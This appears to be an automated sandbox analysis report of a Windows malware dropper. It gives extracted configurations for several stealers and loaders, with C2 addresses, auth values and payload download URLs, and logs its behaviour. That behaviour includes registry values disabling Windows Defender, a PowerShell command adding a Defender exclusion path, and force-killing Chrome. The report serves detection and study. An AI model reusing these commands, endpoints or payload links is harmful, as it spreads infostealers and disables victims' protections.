djvu | 6aa0d341cee633c2783960687c79d951bf270924df527ac4a99b6bfabf28d4ae

Analysis

max time kernel
34s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
13-09-2022 09:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6AA0D341CEE633C2783960687C79D951BF270924DF527.exe
Size

5.9MB
MD5

db11b0f4fce0a897a83b9d733ebc104d
SHA1

d7c345b12e55778385d406ad8c12457f3ce3355d
SHA256

6aa0d341cee633c2783960687c79d951bf270924df527ac4a99b6bfabf28d4ae
SHA512

68e0b4bf461ac12e9712beb5bd42a8e4acc765f4de015defe69156786ba6a1ca8024d033797a2d781645fa376333749993acfaee34e11689d4ee03293da1ec99
SSDEEP

98304:xCCvLUBsgY78h5YKpxbJ3ZRvG40QYLu9ygnOnLvgEEc3a+Vr85:xzLUCgYO5YKB3ZJYLucgnOTggB85

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

privateloader

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp

https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp

https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

https://c.xyzgamec.com/userdown/2202/random.exe

http://193.56.146.76/Proxytest.exe

http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

http://luminati-china.xyz/aman/casper2.exe

https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

http://185.215.113.208/ferrari.exe

https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

https://c.xyzgamec.com/userdown/2202/random.exe

http://mnbuiy.pw/adsli/note8876.exe

http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

http://luminati-china.xyz/aman/casper2.exe

https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

redline

Botnet

media17

91.121.67.60:2151

Attributes

auth_value
e37d5065561884bb54c8ed1baa6de446

Extracted

Family

vidar

Version

41.4

Botnet

916

https://mas.to/@sslam

Attributes

profile_id
916

Extracted

Family

redline

Botnet

ANI

194.104.136.5:46013

Attributes

auth_value
9491a1c5e11eb6097e68a4fa8627fda8

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0006000000022e57-180.dat	family_fabookie
behavioral2/files/0x0006000000022e57-208.dat	family_fabookie

Detects Smokeloader packer 1 IoCs

resource	yara_rule
behavioral2/memory/3324-259-0x00000000008E0000-0x00000000008E9000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Mon001871a94f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Mon001871a94f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Mon00f599fd63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Mon00f599fd63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Mon00f599fd63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Mon001871a94f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Mon001871a94f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Mon001871a94f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Mon00f599fd63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Mon00f599fd63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Mon001871a94f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Mon00f599fd63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Mon00f599fd63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Mon001871a94f.exe

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	372	1944	rundll32.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1532	1944	rundll32.exe	20
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6300	1944	rundll32.exe	20

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral2/memory/3452-258-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/3452-261-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/4904-276-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/4904-277-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0006000000022e4f-167.dat	family_socelars
behavioral2/files/0x0006000000022e4f-184.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger payload 3 IoCs

resource	yara_rule
behavioral2/memory/3840-281-0x00000000023C0000-0x0000000002409000-memory.dmp	family_onlylogger
behavioral2/memory/3840-283-0x0000000000400000-0x00000000007A0000-memory.dmp	family_onlylogger
behavioral2/memory/3840-335-0x0000000000400000-0x00000000007A0000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral2/memory/1664-274-0x0000000002480000-0x0000000002556000-memory.dmp	family_vidar
behavioral2/memory/1664-275-0x0000000000400000-0x00000000007F3000-memory.dmp	family_vidar
behavioral2/memory/1664-312-0x0000000000400000-0x00000000007F3000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0006000000022e46-136.dat	aspack_v212_v242
behavioral2/files/0x0008000000022e3a-137.dat	aspack_v212_v242
behavioral2/files/0x0008000000022e3a-144.dat	aspack_v212_v242
behavioral2/files/0x0006000000022e48-142.dat	aspack_v212_v242
behavioral2/files/0x0006000000022e48-145.dat	aspack_v212_v242
behavioral2/files/0x0008000000022e3a-143.dat	aspack_v212_v242
behavioral2/files/0x0006000000022e46-139.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 24 IoCs

pid	Process
4864	setup_install.exe
3324	Mon00e6caef058a.exe
3528	Mon00494c6467b7bab5.exe
3708	Mon00a8ddd6cbd.exe
1664	Mon00d72b010962694d.exe
4372	Mon003592a9c9.exe
3636	Mon00ff4fc12aa.exe
3768	Mon00f649208d1420.exe
3840	Mon001b59f8accf32131.exe
4380	Mon00ad5267c95.exe
4872	Mon00d2c24efd1c9e2c.exe
4264	Mon00ea5164c7b44.exe
4932	Mon00b15efbd7085afa.exe
4488	Mon001871a94f.exe
4636	Mon00f599fd63.exe
4596	Mon00a123f9945ea874.exe
4808	Mon00d2c24efd1c9e2c.tmp
3240	Mon00d2c24efd1c9e2c.exe
932	Mon00494c6467b7bab5.exe
4272	Mon00d2c24efd1c9e2c.tmp
3452	Mon003592a9c9.exe
4904	Mon00494c6467b7bab5.exe
1432	ESYZ4xAO6IJ.eXE
3008	09xU.exE

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/1984-366-0x0000000140000000-0x0000000140604000-memory.dmp	vmprotect
behavioral2/memory/8332-392-0x0000000140000000-0x0000000140604000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	09xU.exE
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Mon00f599fd63.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	6AA0D341CEE633C2783960687C79D951BF270924DF527.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Mon00ad5267c95.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Mon00d2c24efd1c9e2c.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Mon001871a94f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Mon00b15efbd7085afa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	ESYZ4xAO6IJ.eXE
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 14 IoCs

pid	Process
4864	setup_install.exe
4864	setup_install.exe
4864	setup_install.exe
4864	setup_install.exe
4864	setup_install.exe
4864	setup_install.exe
4808	Mon00d2c24efd1c9e2c.tmp
4272	Mon00d2c24efd1c9e2c.tmp
2272	rundll32.exe
2760	msiexec.exe
2352	rundll32.exe
2352	rundll32.exe
3528	WerFault.exe
3528	WerFault.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4688	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 17 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com
369	api.2ip.ua
370	api.2ip.ua
373	api.2ip.ua
395	ipinfo.io
97	ipinfo.io
98	ipinfo.io
328	ipinfo.io
329	ipinfo.io
503	myexternalip.com
524	api.2ip.ua
101	ipinfo.io
380	ipinfo.io
501	myexternalip.com
348	ipinfo.io
349	ipinfo.io
491	api.2ip.ua

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4372 set thread context of 3452	4372	Mon003592a9c9.exe	122
PID 3528 set thread context of 4904	3528	rundll32.exe	128

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 25 IoCs

pid	pid_target	Process	procid_target
4796	4864	WerFault.exe	83
4832	3840	WerFault.exe	117
2572	3840	WerFault.exe	117
3944	2272	WerFault.exe	145
3928	1664	WerFault.exe	99
5104	3840	WerFault.exe	117
2700	3840	WerFault.exe	117
3092	3840	WerFault.exe	117
64	3840	WerFault.exe	117
3148	3840	WerFault.exe	117
176	3840	WerFault.exe	117
3640	3840	WerFault.exe	117
8324	1984	WerFault.exe	207
17256	8332	WerFault.exe	244
63388	5092	WerFault.exe	211
71528	9768	WerFault.exe	237
3916	77244	WerFault.exe	295
2316	77244	WerFault.exe	295
6228	5240	WerFault.exe	310
6548	6328	WerFault.exe	317
6632	77244	WerFault.exe	295
7348	6688	WerFault.exe	332
8040	6760	WerFault.exe	327
55200	3840	WerFault.exe	117
55736	3840	WerFault.exe	117

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon00e6caef058a.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon00e6caef058a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon00e6caef058a.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
65136	schtasks.exe
52484	schtasks.exe
77264	schtasks.exe
77256	schtasks.exe
71528	schtasks.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
1540	taskkill.exe
6156	taskkill.exe
7784	taskkill.exe
55864	taskkill.exe
3724	taskkill.exe
3132	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3640	powershell.exe
3640	powershell.exe
3640	WerFault.exe
3324	Mon00e6caef058a.exe
3324	Mon00e6caef058a.exe
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3324	Mon00e6caef058a.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeAssignPrimaryTokenPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeLockMemoryPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeIncreaseQuotaPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeMachineAccountPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeTcbPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeSecurityPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeTakeOwnershipPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeLoadDriverPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeSystemProfilePrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeSystemtimePrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeProfSingleProcessPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeIncBasePriorityPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeCreatePagefilePrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeCreatePermanentPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeBackupPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeRestorePrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeShutdownPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeDebugPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeAuditPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeSystemEnvironmentPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeChangeNotifyPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeRemoteShutdownPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeUndockPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeSyncAgentPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeEnableDelegationPrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeManageVolumePrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeImpersonatePrivilege	3708	Mon00a8ddd6cbd.exe
Token: SeCreateGlobalPrivilege	3708	Mon00a8ddd6cbd.exe
Token: 31	3708	Mon00a8ddd6cbd.exe
Token: 32	3708	Mon00a8ddd6cbd.exe
Token: 33	3708	Mon00a8ddd6cbd.exe
Token: 34	3708	Mon00a8ddd6cbd.exe
Token: 35	3708	Mon00a8ddd6cbd.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	4264	Mon00ea5164c7b44.exe
Token: SeDebugPrivilege	3636	Mon00ff4fc12aa.exe
Token: SeDebugPrivilege	3724	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4764 wrote to memory of 4864	4764	6AA0D341CEE633C2783960687C79D951BF270924DF527.exe	83
PID 4764 wrote to memory of 4864	4764	6AA0D341CEE633C2783960687C79D951BF270924DF527.exe	83
PID 4764 wrote to memory of 4864	4764	6AA0D341CEE633C2783960687C79D951BF270924DF527.exe	83
PID 4864 wrote to memory of 4620	4864	setup_install.exe	87
PID 4864 wrote to memory of 4620	4864	setup_install.exe	87
PID 4864 wrote to memory of 4620	4864	setup_install.exe	87
PID 4620 wrote to memory of 3640	4620	cmd.exe	88
PID 4620 wrote to memory of 3640	4620	cmd.exe	88
PID 4620 wrote to memory of 3640	4620	cmd.exe	88
PID 4864 wrote to memory of 216	4864	setup_install.exe	89
PID 4864 wrote to memory of 216	4864	setup_install.exe	89
PID 4864 wrote to memory of 216	4864	setup_install.exe	89
PID 4864 wrote to memory of 2180	4864	setup_install.exe	90
PID 4864 wrote to memory of 2180	4864	setup_install.exe	90
PID 4864 wrote to memory of 2180	4864	setup_install.exe	90
PID 4864 wrote to memory of 1460	4864	setup_install.exe	92
PID 4864 wrote to memory of 1460	4864	setup_install.exe	92
PID 4864 wrote to memory of 1460	4864	setup_install.exe	92
PID 4864 wrote to memory of 792	4864	setup_install.exe	91
PID 4864 wrote to memory of 792	4864	setup_install.exe	91
PID 4864 wrote to memory of 792	4864	setup_install.exe	91
PID 4864 wrote to memory of 2272	4864	setup_install.exe	93
PID 4864 wrote to memory of 2272	4864	setup_install.exe	93
PID 4864 wrote to memory of 2272	4864	setup_install.exe	93
PID 4864 wrote to memory of 4576	4864	setup_install.exe	94
PID 4864 wrote to memory of 4576	4864	setup_install.exe	94
PID 4864 wrote to memory of 4576	4864	setup_install.exe	94
PID 4864 wrote to memory of 3268	4864	setup_install.exe	105
PID 4864 wrote to memory of 3268	4864	setup_install.exe	105
PID 4864 wrote to memory of 3268	4864	setup_install.exe	105
PID 2180 wrote to memory of 3324	2180	cmd.exe	95
PID 2180 wrote to memory of 3324	2180	cmd.exe	95
PID 2180 wrote to memory of 3324	2180	cmd.exe	95
PID 1460 wrote to memory of 3708	1460	cmd.exe	104
PID 1460 wrote to memory of 3708	1460	cmd.exe	104
PID 1460 wrote to memory of 3708	1460	cmd.exe	104
PID 216 wrote to memory of 3528	216	cmd.exe	103
PID 216 wrote to memory of 3528	216	cmd.exe	103
PID 216 wrote to memory of 3528	216	cmd.exe	103
PID 4864 wrote to memory of 4724	4864	setup_install.exe	96
PID 4864 wrote to memory of 4724	4864	setup_install.exe	96
PID 4864 wrote to memory of 4724	4864	setup_install.exe	96
PID 4864 wrote to memory of 1192	4864	setup_install.exe	97
PID 4864 wrote to memory of 1192	4864	setup_install.exe	97
PID 4864 wrote to memory of 1192	4864	setup_install.exe	97
PID 4864 wrote to memory of 2320	4864	setup_install.exe	98
PID 4864 wrote to memory of 2320	4864	setup_install.exe	98
PID 4864 wrote to memory of 2320	4864	setup_install.exe	98
PID 792 wrote to memory of 1664	792	cmd.exe	99
PID 792 wrote to memory of 1664	792	cmd.exe	99
PID 792 wrote to memory of 1664	792	cmd.exe	99
PID 2272 wrote to memory of 4372	2272	rundll32.exe	102
PID 2272 wrote to memory of 4372	2272	rundll32.exe	102
PID 2272 wrote to memory of 4372	2272	rundll32.exe	102
PID 4864 wrote to memory of 424	4864	setup_install.exe	100
PID 4864 wrote to memory of 424	4864	setup_install.exe	100
PID 4864 wrote to memory of 424	4864	setup_install.exe	100
PID 4576 wrote to memory of 3636	4576	mshta.exe	101
PID 4576 wrote to memory of 3636	4576	mshta.exe	101
PID 4576 wrote to memory of 3636	4576	mshta.exe	101
PID 4864 wrote to memory of 444	4864	setup_install.exe	107
PID 4864 wrote to memory of 444	4864	setup_install.exe	107
PID 4864 wrote to memory of 444	4864	setup_install.exe	107
PID 3268 wrote to memory of 3768	3268	cmd.exe	118

C:\Users\Admin\AppData\Local\Temp\6AA0D341CEE633C2783960687C79D951BF270924DF527.exe
"C:\Users\Admin\AppData\Local\Temp\6AA0D341CEE633C2783960687C79D951BF270924DF527.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4764
- C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00494c6467b7bab5.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:216
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00494c6467b7bab5.exe
      Mon00494c6467b7bab5.exe
      4⤵
      Executes dropped EXE
      PID:3528
    - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00494c6467b7bab5.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00494c6467b7bab5.exe
        5⤵
        Executes dropped EXE
        
        PID:932
    - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00494c6467b7bab5.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00494c6467b7bab5.exe
        5⤵
        Executes dropped EXE
        
        PID:4904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00e6caef058a.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00e6caef058a.exe
      Mon00e6caef058a.exe
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00d72b010962694d.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:792
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00d72b010962694d.exe
      Mon00d72b010962694d.exe
      4⤵
      Executes dropped EXE
      PID:1664
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 928
        5⤵
        Program crash
        
        PID:3928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00a8ddd6cbd.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00a8ddd6cbd.exe
      Mon00a8ddd6cbd.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3708
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:3712
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon003592a9c9.exe
    3⤵
    PID:2272
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon003592a9c9.exe
      Mon003592a9c9.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4372
    - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon003592a9c9.exe
        
